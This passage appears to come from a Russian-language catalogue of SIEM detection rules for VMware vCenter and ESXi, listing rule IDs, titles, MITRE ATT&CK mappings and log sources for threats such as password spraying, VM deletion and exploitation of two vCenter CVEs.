TA0006 (Credential Access)

T1110 (Brute Force), T1110.001 (Brute Force: Password Guessing)

vpxd.log

VMware

VMware ESXi, VMware vCenter

RV-D-214

Выгрузка файла с критичной виртуальной машины

TA0006 (Credential Access)

T1003 (OS Credential Dumping)

vpxd.log

VMware

VMware ESXi, VMware vCenter

RV-D-215

Выгрузка нескольких файлов с критичной виртуальной машины

TA0006 (Credential Access), TA0009 (Collection)

T1003 (OS Credential Dumping), T1119 (Automated Collection)

vpxd.log

VMware

VMware ESXi, VMware vCenter

RV-D-216

Обнаружение атаки Password Spraying

TA0006 (Credential Access)

T1110 (Brute Force), T1110.003 (Brute Force: Password Spraying), T1110.004 (Brute Force: Credential Stuffing)

vpxd.log

VMware

VMware ESXi, VMware vCenter

RV-D-217

Возможно успешный подбор пароля пользователя на VMware

TA0006 (Credential Access)

T1110 (Brute Force), T1110.001 (Brute Force: Password Guessing)

vpxd.log

VMware

VMware ESXi, VMware vCenter

RV-D-218

Изменение конфигурации критичной виртуальной машины

TA0040 (Impact), TA0011 (Command and Control), TA0005 (Defense Evasion)

T1095 (Non-Application Layer Protocol), T1485 (Data Destruction), T1565 (Data Manipulation), T1565.003 (Data Manipulation: Runtime Data Manipulation)

vpxd.log

VMware

VMware ESXi, VMware vCenter

RV-D-219

Изменение конфигурации нескольких критичных виртуальных машин

TA0040 (Impact), TA0011 (Command and Control), TA0005 (Defense Evasion)

T1095 (Non-Application Layer Protocol), T1485 (Data Destruction), T1485.001 (Data Destruction: Lifecycle-Triggered Deletion), T1565 (Data Manipulation), T1565.003 (Data Manipulation: Runtime Data Manipulation)

vpxd.log

VMware

VMware ESXi, VMware vCenter

RV-D-223

Создание множества виртуальных машин

TA0040 (Impact), TA0005 (Defense Evasion)

T1485 (Data Destruction), T1499 (Endpoint Denial of Service), T1499.001 (Endpoint Denial of Service: OS Exhaustion Flood), T1564 (Hide Artifacts), T1564.006 (Hide Artifacts: Run Virtual Instance)

vpxd.log

VMware

VMware ESXi, VMware vCenter

RV-D-224

Отключена критичная виртуальная машина

TA0040 (Impact), TA0005 (Defense Evasion)

T1485 (Data Destruction), T1529 (System Shutdown/Reboot)

vpxd.log

VMware

VMware ESXi, VMware vCenter

RV-D-225

Отключено несколько критичных виртуальных машин

TA0040 (Impact), TA0005 (Defense Evasion)

T1485 (Data Destruction), T1529 (System Shutdown/Reboot)

vpxd.log

VMware

VMware ESXi, VMware vCenter

RV-D-227

Удалена критичная виртуальная машина

TA0040 (Impact)

T1485 (Data Destruction)

vpxd.log

VMware

VMware ESXi, VMware vCenter

RV-D-228

Удалено несколько критичных виртуальных машин

TA0040 (Impact)

T1485 (Data Destruction)

vpxd.log

VMware

VMware ESXi, VMware vCenter

RV-D-229

Вход под привилегированной учетной записью с неизвестного хоста

TA0001 (Initial Access)

T1078 (Valid Accounts), T1078.003 (Valid Accounts: Local Accounts)

vpxd.log

VMware

VMware ESXi, VMware vCenter

RV-D-769

Вызов и выполнение Guest API в гостевой ОС

TA0002 (Execution)

T1675 (ESXi Administration Command)

vpxd.log,hostd.log

VMware

VMware vCenter

RV-D-212

Клонирование критичной виртуальной машины

TA0006 (Credential Access), TA0004 (Privilege Escalation), TA0003 (Persistence)

T1003 (OS Credential Dumping)

vpxd.log

VMware

VMware vCenter

RV-D-213

Клонирование нескольких критичных виртуальных машин

TA0006 (Credential Access), TA0004 (Privilege Escalation), TA0003 (Persistence)

T1003 (OS Credential Dumping)

vpxd.log

VMware

VMware vCenter

RV-D-220

Эксплуатация уязвимости CVE-2021-22005 на сервере vCenter

TA0002 (Execution), TA0008 (Lateral Movement), TA0001 (Initial Access)

T1190 (Exploit Public-Facing Application), T1203 (Exploitation for Client Execution), T1210 (Exploitation of Remote Services)

Auditd

VMware

VMware vCenter

RV-D-221

Эксплуатация уязвимости CVE-2021-21972 на сервере vCenter

TA0001 (Initial Access), TA0002 (Execution), TA0008 (Lateral Movement), TA0011 (Command and Control)

T1071 (Application Layer Protocol), T1071.001 (Application Layer Protocol: Web Protocols), T1190 (Exploit Public-Facing Application), T1203 (Exploitation for Client Execution), T1210 (Exploitation of Remote Services)

Auditd, access.log

VMware

VMware vCenter

RV-D-222

Доступ к критичным файлам на сервере vCenter

TA0001 (Initial Access), TA0008 (Lateral Movement), TA0006 (Credential Access), TA0002 (Execution), TA0003 (Persistence)

T1037 (Boot or Logon Initialization Scripts), T1037.004 (Boot or Logon Initialization Scripts: RC Scripts), T1053 (Scheduled Task/Job), T1053.003 (Scheduled Task/Job: Cron), T1078 (Valid Accounts), T1078.001 (Valid Accounts: Default Accounts), T1110 (Brute Force), T1110.002 (Brute Force: Password Cracking), T1190 (Exploit Public-Facing Application), T1203 (Exploitation for Client Execution), T1210 (Exploitation of Remote Services), T1212 (Exploitation for Credential Access), T1555 (Credentials from Password Stores)

Auditd